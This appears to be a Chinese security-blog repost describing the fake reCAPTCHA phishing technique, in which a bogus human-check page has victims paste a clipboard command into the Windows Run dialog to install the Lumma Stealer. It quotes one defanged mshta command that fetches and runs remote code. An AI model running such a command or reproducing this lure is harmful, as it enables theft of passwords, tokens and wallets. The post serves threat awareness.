安小圈
第510期
网络钓鱼 reCAPTCHA
reCAPTCHA 网络钓鱼是在2024 年 8 -9 月在野发现的一种新型钓鱼方式,本文用以描述和演示此钓鱼方式。
Win+R
打开 Windows 运行对话框,并让他们使用Ctrl+V
Web 浏览器已预先复制到剪贴板中的恶意命令。虽然,看起来有点过于简单直接,但是其却出奇的有效...
截至 2024 年 8 月下旬,攻击者一直在使用欺诈性的“人工验证”页面来诱骗用户执行恶意 PowerShell 脚本。Lumma Stealer 旨在从受感染的计算机中窃取敏感信息,例如密码、会话令牌、加密货币钱包和其他个人数据。
假验证码页面
恶意PowerShell脚本的执行
PowerShell 脚本获取恶意 PE32 可执行文件(Lumma Stealer),然后在受害者的计算机上运行。
恶意命令执行示例:
mshta hxxps[:]//propller.b-cdn[.]net/propller
web页面js代码
-
阿里云机房着火超30个小时,云服务宕机,AWS趁火打劫?
原文始发于微信公众号(安小圈):脑洞大开的【新型】钓鱼方法 -- reCAPTCHA 【网络钓鱼】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论